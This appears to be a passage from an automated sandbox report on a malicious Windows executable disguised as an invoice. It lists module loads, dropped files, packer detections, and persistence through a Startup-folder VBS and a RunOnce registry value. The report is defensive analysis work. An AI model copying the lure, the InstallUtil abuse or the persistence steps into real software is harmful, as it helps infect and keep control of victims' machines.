                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvbvm60.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vb6zz.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvbvm60.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vb6zz.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: scrrun.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsqlite3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vbscript.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Factura modificada____678979879.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Factura modificada____678979879.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: Factura modificada____678979879.exeStatic file information: File size 3441152 > 1048576
                  Source: Factura modificada____678979879.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x347800
                  Source: Factura modificada____678979879.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003E11000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1405689602.0000000006F00000.00000004.08000000.00040000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.00000000039F7000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002B23000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: W.pdb4 source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000003032000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003F32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545997056.0000000000438000.00000040.00000400.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003E11000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1405689602.0000000006F00000.00000004.08000000.00040000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.00000000039F7000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002B23000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000004.00000002.2549138176.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, fitfulness.exe, 00000009.00000000.1644425682.0000000000092000.00000002.00000001.01000000.0000000E.sdmp, fitfulness.exe.4.dr
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000004.00000002.2549138176.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, fitfulness.exe, 00000009.00000000.1644425682.0000000000092000.00000002.00000001.01000000.0000000E.sdmp, fitfulness.exe.4.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.6dc0000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.4a60070.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.47bb610.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Factura modificada____678979879.exe.48bb630.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1740206396.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1724721626.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1404671311.0000000006DC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1393807620.00000000047A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Factura modificada____678979879.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WrappedObject.exe PID: 5784, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_07746D72 push edx; ret 1_2_07746D73
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_07744D05 push ebp; ret 1_2_07744D06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0043C66E push CE800002h; iretd 4_2_0043C675
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00401A9C push edi; retn 0041h4_2_00401A9D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040CB90 push eax; retf 4_2_0040CB91
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_074A6D72 push edx; ret 8_2_074A6D73
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_074A4D05 push ebp; ret 8_2_074A4D06
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeFile created: C:\Users\user\AppData\Roaming\WrappedObject.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbsJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce flammigerousJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce flammigerousJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce flammigerousJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce flammigerousJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
